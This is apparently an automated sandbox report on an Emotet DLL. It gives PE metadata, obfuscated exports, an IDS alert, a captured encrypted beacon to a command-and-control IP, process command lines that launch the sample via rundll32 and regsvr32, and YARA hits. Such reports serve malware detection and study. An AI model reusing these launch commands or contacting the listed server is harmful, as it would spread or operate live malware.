                                                                    .pdata0x750000x46200x4800False0.4896918402777778data5.7263789636668765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .00cfg0x7a0000x280x200False0.05859375data0.37171553503035126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .gehcont0x7b0000x500x200False0.130859375PGP\011Secret Sub-key -0.5546627733147627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .gxfg0x7c0000x9eb00xa000False0.336083984375data5.261757688277708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .retplne0x860000x5c0x200False0.087890625data0.8458487823546629
                                                                    .voltbl0x870000x540x200False0.18359375data1.322754253639915
                                                                    _RDATA0x880000xf40x200False0.314453125data1.9917660782863578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x890000x280800x28200False0.8353168808411215data7.725336511078031IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xb20000x8080xa00False0.454296875data4.922299312910362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_STRING0xb10380x48dataEnglishUnited States
                                                                    RT_HTML0x892380x27e00dataEnglishUnited States
                                                                    RT_MANIFEST0x890f00x143XML 1.0 document, ASCII textEnglishUnited States
                                                                    DLLImport
                                                                    GDI32.dllCreatePen, DeleteObject, LineTo, MoveToEx, Polyline, SelectObject
                                                                    USER32.dllBeginPaint, CloseGestureInfoHandle, CreateWindowExW, DefWindowProcW, DestroyWindow, DispatchMessageW, EndPaint, GetGestureInfo, GetMessageW, InvalidateRect, LoadCursorW, LoadStringW, PostQuitMessage, RegisterClassExW, ScreenToClient, SetGestureConfig, ShowWindow, TranslateAcceleratorW, TranslateMessage, UpdateWindow
                                                                    KERNEL32.dllCloseHandle, CompareStringW, CreateFileW, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetEnvironmentStringsW, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetTimeFormatW, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, InterlockedFlushSList, InterlockedPushEntrySList, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, OutputDebugStringW, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwind, RtlUnwindEx, RtlVirtualUnwind, SetConsoleCtrlHandler, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                    NameOrdinalAddress
                                                                    ABeFtrnwmgAedx10x1800029d0
                                                                    AEjATaIExpQg20x180002890
                                                                    AbfBlUFQKbpevAFdaCpElBdscB30x180002200
                                                                    AhCiOqhwyUiZbbsGncKmyLU40x1800026f0
                                                                    AppWcUGsNPSALiojxbzmIncLqw50x1800028f0
                                                                    BuDIuWLYHzeYLi60x180002260
                                                                    BzspXLkN70x1800024f0
                                                                    CAJbrnGzThPxKInHYeNbeiD80x180002980
                                                                    CAizYoExRRpdPoWVbPYKFDwgiU90x180002800
                                                                    DllRegisterServer100x180002170
                                                                    DsznQIJtSEfpoaC110x1800022b0
                                                                    DwKmpHIDu120x180002930
                                                                    ECDzEWMCYJeoRkryuQOsYJpmq130x1800022e0
                                                                    FAcdRHAWz140x180002610
                                                                    FFgOwmblMRuJiEZKeYTYiuzs150x1800023f0
                                                                    FGcNCKAIdduwyHBYG160x180002860
                                                                    FrsmtxAdhb170x180002590
                                                                    FycDPRFayBivcQtViJFBB180x180002320
                                                                    GGGPAvQKBPbfXZZaHVp190x180002920
                                                                    GKgyyDJNJDeNTLdDtczKsL200x180002340
                                                                    GMWWgDWCipXlIkjHwoUVUkcYR210x1800026e0
                                                                    GXJpVyiTrLHOne220x1800023d0
                                                                    HJTFoxcPliQgvLgH230x180002820
                                                                    HLCABIQMByMWBQl240x180002720
                                                                    HSSmJwdyKCypI250x180002650
                                                                    HuenqNYbiVIeAyMGFYkiYBPFpc260x180002770
                                                                    IxremlDMjrvkDxgZfhGQZrk270x180002700
                                                                    IxvOJTyBGbJYNRuYaPxjyAUmf280x180002380
                                                                    JQPbXc290x180002270
                                                                    JcMTbvPHZlumePpXUBhRJWcp300x180002350
                                                                    JnZLIBBbkn310x1800025e0
                                                                    JohOupoqASpLhYFLsyWn320x180002950
                                                                    JwPmjlqZQXgHaQjgtKwKH330x180002940
                                                                    LsCgTlMZDLwMutNSvzYIEdEhwL340x180002330
                                                                    MPWJOPLDpgeYBymjBqgQIjmNoZ350x180002360
                                                                    MXztYxhtX360x1800021f0
                                                                    McniJoPJlmcEHlRCsaUz370x180002550
                                                                    MhvpJKCzeAS380x180002620
                                                                    MmBOoLzloNcLojEtz390x1800027a0
                                                                    MoxtcCOHATssMTmiLf400x1800029e0
                                                                    MpzzLNccslEpsqsI410x180002540
                                                                    NqTxbmWhjf420x1800027e0
                                                                    NsnrjJneCojFavepwQt430x180002430
                                                                    OFTAEmNeIKkEpTykdZkNKIzp440x180002520
                                                                    OguNFmV450x1800025f0
                                                                    PXDdTdN460x1800026d0
                                                                    PvWkibWuSiAacbZGzrkJUt470x1800021b0
                                                                    QFGNloHdiwsP480x180002450
                                                                    QOFKcQtiQXM490x180002830
                                                                    QmukeRFviFO500x1800021a0
                                                                    QupOoHScTGifO510x1800026a0
                                                                    QyvetqDJywCLrVJLzofDOegxwP520x180002710
                                                                    RmPpiUfGU530x180002750
                                                                    SIkquaNCflVmESatNcndpdTlpe540x1800028d0
                                                                    SfIHxYaArvTuFNrMVIbyX550x180002470
                                                                    UWpelES560x180002880
                                                                    UkLettFcomFXma570x180002990
                                                                    VLdhIHLdMhyW580x1800025b0
                                                                    VcULfipZVLXGKZRfrueex590x180002500
                                                                    VqpcWzxeRjlVhQwQzv600x180002410
                                                                    WBpPkPKcWeqGwAzzvNIH610x180002790
                                                                    WEDyKrcivTPPlSwCwT620x180002370
                                                                    WoptoKqfVNqOqwssFKVZfo630x180002670
                                                                    XnGdCqyiMLdhVnMShSkq640x180002630
                                                                    YMyyyHvdBObwWJjXdFk650x180002250
                                                                    YihCWA660x180002530
                                                                    YweLMeZukpQkvnZnYHkhCM670x180002780
                                                                    ZLVzkIypQXUkzx680x180002900
                                                                    ZSoNGzxKLdyqDghj690x180002640
                                                                    ZkiQhRLkrjLkJNX700x180002730
                                                                    ZmqtKkySX710x180002210
                                                                    aPfqQAbMTzuJNp720x180002390
                                                                    aehnZNNrhIsF730x1800029a0
                                                                    amxdxgjfMZcXaFUifsfcvLXi740x1800022a0
                                                                    bPfPnNT750x1800023a0
                                                                    bubLuYEWIvIWsBNJTUOnl760x1800023e0
                                                                    cTcqyCZyBDJvEFnsvQYDCOLAoT770x1800022f0
                                                                    cYubuRW780x1800027f0
                                                                    clFUgmrVuPSljrxXorVz790x180002230
                                                                    dbMiEkrHbNnvlIaysX800x180002600
                                                                    dgAUOlElUrm810x1800021d0
                                                                    dxEatgtTYroSUkMiQaL820x180002220
                                                                    eCkbiLnmCybWxEn830x180002440
                                                                    efVluiugFvmsD840x1800029b0
                                                                    exoEcLTZltlKDhXcTPLBLvM850x1800026b0
                                                                    fAgLiyKNqrsT860x180002660
                                                                    fEeZsQFKbuLaABrhuAbOhNj870x180002420
                                                                    gYiNJrEBUixiSygWCLlsEf880x180002680
                                                                    gpObsYCSb890x1800023c0
                                                                    gtbMrIHBEjSZnmBWPb900x180002840
                                                                    hCcvyzzlUZCYlRNZCTK910x1800027b0
                                                                    hPDZNFuvABEgQeoD920x180002850
                                                                    hsEYnjr930x180002460
                                                                    iLEOjsJklFUGkNI940x1800025c0
                                                                    iLjGFeOafkDi950x1800024d0
                                                                    jcCPKYwgGqRpySHQKBnfIdayWD960x1800022c0
                                                                    jjTWNPlegZljgiNVCWFLUDkFH970x180002280
                                                                    kffHAP980x180002560
                                                                    lUlTXKofnHgBxwxJLPdDPpCz990x1800028c0
                                                                    lYaeKiHDZBLcjXyoPcEOBUc1000x1800024c0
                                                                    lpGoEIn1010x1800023b0
                                                                    mAtENYctTeMWWmtQ1020x180002760
                                                                    mEiZkvnenxFVSgbXocseslt1030x1800028a0
                                                                    mSkIHCWnxYjPAvLhkizRM1040x180002480
                                                                    nciUfwCE1050x1800025a0
                                                                    nfBvdBN1060x180002310
                                                                    ngwzyo1070x180002960
                                                                    njQxmJYMOWniVIJCxlqYaGwyco1080x180002290
                                                                    pikxaDuNdKkEyUKlBLtRo1090x1800024b0
                                                                    qYcNCgPzHhoixH1100x180002400
                                                                    qbLCbNjvgZccfXANyoilYHLz1110x1800024a0
                                                                    rIgvWBvLm1120x180002810
                                                                    rMHLHjIymAUoTHNFdsfNPiQH1130x1800028b0
                                                                    riiAnEEXhiFVUIdp1140x180002870
                                                                    sCXUQoygEhYAvHSLAtQPOlI1150x180002910
                                                                    sNgDDxTXeDBSWJVL1160x1800021c0
                                                                    sjmfaFHjAYLiTOs1170x180002970
                                                                    uFvBoQlDuBHPbcggfbqTz1180x180002240
                                                                    uKxBgklrkubs1190x180002300
                                                                    ueGFocoIB1200x180002690
                                                                    ueINzYdzNpuGfNAPnf1210x1800029c0
                                                                    vAVSflnhL1220x1800022d0
                                                                    vJROvhiSqVeOiIsH1230x1800021e0
                                                                    vfDcFWpsvSWqEKgMwpzmloZ1240x1800027c0
                                                                    vzyObHl1250x1800027d0
                                                                    wAavZUBVHJ1260x180002740
                                                                    wCHWOvC1270x1800026c0
                                                                    wQlVOK1280x1800028e0
                                                                    wZFewnVovChWmNJWJDqUTvJm1290x180002580
                                                                    wkraMphf1300x1800025d0
                                                                    xkQCLrMtQvyCjJhPSdk1310x1800024e0
                                                                    yYodwLnmm1320x180002510
                                                                    ysdKIUzdVU1330x180002570
                                                                    zFCiVYrpvmmXdRHTSKMcojyZb1340x180002490
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    192.168.2.5188.165.79.151497724432404320 07/22/22-13:16:45.923727TCP2404320ET CNC Feodo Tracker Reported CnC Server TCP group 1149772443192.168.2.5188.165.79.151
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jul 22, 2022 13:16:45.396075964 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:45.396126986 CEST44349772188.165.79.151192.168.2.5
                                                                    Jul 22, 2022 13:16:45.396208048 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:45.415882111 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:45.415935040 CEST44349772188.165.79.151192.168.2.5
                                                                    Jul 22, 2022 13:16:45.538677931 CEST44349772188.165.79.151192.168.2.5
                                                                    Jul 22, 2022 13:16:45.538773060 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:45.919445038 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:45.919504881 CEST44349772188.165.79.151192.168.2.5
                                                                    Jul 22, 2022 13:16:45.920139074 CEST44349772188.165.79.151192.168.2.5
                                                                    Jul 22, 2022 13:16:45.920217991 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:45.923537970 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:45.964503050 CEST44349772188.165.79.151192.168.2.5
                                                                    Jul 22, 2022 13:16:46.333272934 CEST44349772188.165.79.151192.168.2.5
                                                                    Jul 22, 2022 13:16:46.333344936 CEST44349772188.165.79.151192.168.2.5
                                                                    Jul 22, 2022 13:16:46.333456993 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:46.334310055 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:46.336334944 CEST49772443192.168.2.5188.165.79.151
                                                                    Jul 22, 2022 13:16:46.336368084 CEST44349772188.165.79.151192.168.2.5
                                                                    • 188.165.79.151
                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.549772188.165.79.151443C:\Windows\System32\regsvr32.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-07-22 11:16:45 UTC0OUTGET / HTTP/1.1
                                                                    Cookie: kJZtvOKXxX=hTloIDqhoyWpurUw3AxwGwlasyWlepnQrzPzxDdUOeOLyYl1IS66LGJ7p3GRml0qSCniQY8iO9vwBvYi0s9GFTLntOUX1Zv/Yct+Xz8D8ChWhoNEM9sP7kk/vQZZ5Ril8i53FqG17zNu5+qxXeF44TrT5h9rSAkz2z7kX0nZnwYiZveRpVLi2JYEMWQdksTrTzltZQZOrQPQdu4BaI2PwYAAsLHNp24r2uk3knZ1f90JTxLZKGsWTLdTxREVM9QYo5C/g/WNCeWU7ydkurXqgqGDaOFhx/8wopk+lxr0GYWs4XyAPwQ23Q==
                                                                    Host: 188.165.79.151
                                                                    Connection: Keep-Alive
                                                                    Cache-Control: no-cache
                                                                    2022-07-22 11:16:46 UTC0INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Fri, 22 Jul 2022 11:16:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    2022-07-22 11:16:46 UTC0INData Raw: 34 31 33 0d 0a 4f c9 a8 f9 d3 3a 1d d9 50 db be bb 14 90 45 c8 79 2a ea 93 97 fb b7 48 bf 22 da 80 a6 5a 66 b9 11 75 fe ae d6 76 5f e3 ae 83 2f df 3d 44 1e 64 f0 85 d7 3d 13 07 bd c8 b0 b0 f1 49 fc 12 6f 15 8c b4 32 88 a7 b2 99 23 62 bc 10 ba ca 3c 93 78 a8 69 ea ef f4 67 44 96 4f f8 70 a2 94 59 f2 74 66 44 2a aa 00 84 b3 52 ac 4d d5 ce fb aa 8a 4a 95 8a 2b 3c 53 d5 9a 26 e1 9a c3 92 f2 a2 b8 1b 0f 07 53 4f 69 17 2d 0a d6 6d 02 d0 d0 6b 04 fd a4 94 ed a4 61 58 a6 c5 f2 93 38 bf 05 9a 68 be f9 92 0c 8f 59 7a 45 59 15 0e 29 7e c0 06 4e 6a 38 43 aa 5b ea ff 37 1b 20 a6 1b 4b 31 4c 4f 4c ba 76 3d f9 fd fe 2e 0f 70 7e 3a ee 5c ad e9 f3 4b f9 d9 70 18 08 ba 6c 62 68 05 c4 95 97 70 25 f5 74 f2 9a d4 09 cf 07 ca 89 36 f4 fc 90 c9 fb db 48 85 2e 74 c2 8c 06 f9 e6
                                                                    Data Ascii: 413O:PEy*H"Zfuv_/=Dd=Io2#b<xigDOpYtfD*RMJ+<S&SOi-mkaX8hYzEY)~Nj8C[7 K1LOLv=.p~:\Kplbhp%t6H.t


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:13:16:30
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\loaddll64.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:loaddll64.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll"
                                                                    Imagebase:0x7ff61ce00000
                                                                    File size:140288 bytes
                                                                    MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:1
                                                                    Start time:13:16:30
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                                                                    Imagebase:0x7ff602050000
                                                                    File size:273920 bytes
                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:2
                                                                    Start time:13:16:30
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:regsvr32.exe /s C:\Users\user\Desktop\5CUFfVMSaQ.dll
                                                                    Imagebase:0x7ff6727f0000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.452429989.0000000002810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_2, Description: Yara detected Emotet, Source: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:3
                                                                    Start time:13:16:31
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                                                                    Imagebase:0x7ff644760000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.448904188.0000025326DA1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.448824975.0000025325750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:4
                                                                    Start time:13:16:31
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,ABeFtrnwmgAedx
                                                                    Imagebase:0x7ff644760000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.449537237.00000237550F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.449599584.0000023755221000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:5
                                                                    Start time:13:16:34
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AEjATaIExpQg
                                                                    Imagebase:0x7ff644760000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:6
                                                                    Start time:13:16:35
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll"
                                                                    Imagebase:0x7ff6727f0000
                                                                    File size:24064 bytes
                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet_3, Description: , Source: 00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.964724556.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_2, Description: Yara detected Emotet, Source: 00000006.00000002.965051526.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.964860380.0000000002911000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Target ID:7
                                                                    Start time:13:16:38
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AbfBlUFQKbpevAFdaCpElBdscB
                                                                    Imagebase:0x7ff644760000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:11
                                                                    Start time:13:16:53
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:12
                                                                    Start time:13:16:54
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:14
                                                                    Start time:13:17:10
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:18
                                                                    Start time:13:17:31
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:20
                                                                    Start time:13:17:49
                                                                    Start date:22/07/2022
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                    Imagebase:0x7ff78ca80000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:3.6%
                                                                      Dynamic/Decrypted Code Coverage:18.3%
                                                                      Signature Coverage:14.7%
                                                                      Total number of Nodes:191
                                                                      Total number of Limit Nodes:6
                                                                      execution_graph 39843 2800000 39844 2800183 39843->39844 39845 280043e VirtualAlloc 39844->39845 39849 2800462 39845->39849 39846 2800a7b 39847 2800531 GetNativeSystemInfo 39847->39846 39848 280056d VirtualAlloc 39847->39848 39850 280058b VirtualAlloc 39848->39850 39854 28005a0 39848->39854 39849->39846 39849->39847 39850->39854 39851 2800a00 39851->39846 39852 2800a56 RtlAddFunctionTable 39851->39852 39852->39846 39853 28009d9 VirtualProtect 39853->39854 39854->39851 39854->39853 39854->39854 39855 18003c378 39856 18003c3c3 39855->39856 39860 18003c387 _set_error_mode 39855->39860 39863 18003bffc 11 API calls _set_error_mode 39856->39863 39857 18003c3aa RtlAllocateHeap 39859 18003c3c1 39857->39859 39857->39860 39860->39856 39860->39857 39862 18003add4 EnterCriticalSection LeaveCriticalSection _set_error_mode 39860->39862 39862->39860 39863->39859 39864 285f320 39865 285f36f 39864->39865 39868 28449a0 39865->39868 39867 285f501 39870 2844a4e 39868->39870 39869 2844ad7 CreateProcessW 39869->39867 39870->39869 39871 2845b0c 39874 285ba54 39871->39874 39873 2845bce 39877 285ba86 39874->39877 39875 285bd8a 39875->39873 39876 285bd6f Process32FirstW 39876->39877 39877->39875 39877->39876 39878 2853e1c 39881 284b1e0 39878->39881 39880 2853e75 39885 284b238 39881->39885 39882 284bbef 39882->39880 39883 284ca1b 39894 2847c64 CreateProcessW 39883->39894 39885->39882 39885->39883 39890 2865c18 Process32FirstW 39885->39890 39891 285327c Process32FirstW 39885->39891 39892 2866a84 Process32FirstW 39885->39892 39893 28540e0 CreateProcessW 39885->39893 39890->39885 39891->39885 39892->39885 39893->39885 39894->39882 39895 180003e30 39900 180003e56 39895->39900 39896 180003e5e 39897 180003ea4 39897->39896 39933 180001c40 39897->39933 39900->39896 39900->39897 39905 180003dbc 39900->39905 39902 180003edb 39902->39896 39904 180003dbc 121 API calls 39902->39904 39903 180001c40 109 API calls 39903->39902 39904->39896 39917 180003c20 __scrt_acquire_startup_lock 39905->39917 39906 180003dc9 39907 180003de4 39906->39907 39908 180003dce 39906->39908 39967 18000333c 39907->39967 39911 180003dd3 39908->39911 39980 180003364 20 API calls 39908->39980 39911->39897 39912 180003de2 39912->39897 39914 180003d78 39976 1800032f8 23 API calls __scrt_release_startup_lock 39914->39976 39915 180003a34 7 API calls 39915->39917 39917->39905 39917->39906 39917->39914 39917->39915 39919 180003c65 39917->39919 39929 180003ca7 BuildCatchObjectHelperInternal __scrt_release_startup_lock 39917->39929 39955 180003148 39917->39955 39918 180003d7d 39977 1800040cc InterlockedFlushSList __std_exception_copy 39918->39977 39974 1800032ac 7 API calls 39919->39974 39922 180003d82 _RTC_Initialize __scrt_release_startup_lock 39978 180003194 98 API calls __scrt_initialize_crt 39922->39978 39923 180003c74 _RTC_Initialize 39923->39929 39975 1800040bc InitializeSListHead 39923->39975 39926 180003d9f 39979 180003328 6 API calls __vcrt_uninitialize_ptd 39926->39979 39927 180003c82 39963 18002a6cc 39927->39963 39929->39897 39932 180003c9e __scrt_dllmain_after_initialize_c 39932->39929 39934 180001c7a memcpy_s 39933->39934 39940 180001c8c 39933->39940 39934->39940 40067 18002af64 39934->40067 39936 180001fc1 39936->39902 39936->39903 39939 180001d03 LoadStringW LoadStringW 39941 180001d47 __std_exception_copy 39939->39941 40078 180002fb0 8 API calls 2 library calls 39940->40078 39941->39940 39942 18002af64 64 API calls 39941->39942 39943 180001dd8 VirtualAlloc 39942->39943 39944 180001e10 __scrt_get_show_window_mode 39943->39944 39944->39940 39945 180001ecc 39944->39945 40075 180001fd0 10 API calls DName::DName 39945->40075 39947 180001ed6 40076 1800020a0 CreateWindowExW ShowWindow UpdateWindow 39947->40076 39949 180001ee4 39950 180001eed 39949->39950 39951 180001f02 GetMessageW 39949->39951 40077 180002c50 96 API calls DName::DName 39949->40077 39950->39940 39951->39950 39952 180001f23 TranslateAcceleratorW 39951->39952 39952->39949 39954 180001f52 TranslateMessage DispatchMessageW 39954->39949 39981 1800037c8 39955->39981 39958 180003177 39983 180005490 39958->39983 39961 180003173 39961->39917 39964 18002a6df 39963->39964 39965 180003c9a 39964->39965 40000 180005684 39964->40000 39965->39929 39965->39932 40029 180004a68 39967->40029 39970 180003349 39970->39912 39974->39923 39976->39918 39977->39922 39978->39926 39979->39929 39980->39912 39982 18000316a __scrt_dllmain_crt_thread_attach 39981->39982 39982->39958 39982->39961 39984 18003a6b8 39983->39984 39985 18000317c 39984->39985 39988 18003935c 39984->39988 39985->39961 39987 180004a3c 7 API calls 2 library calls 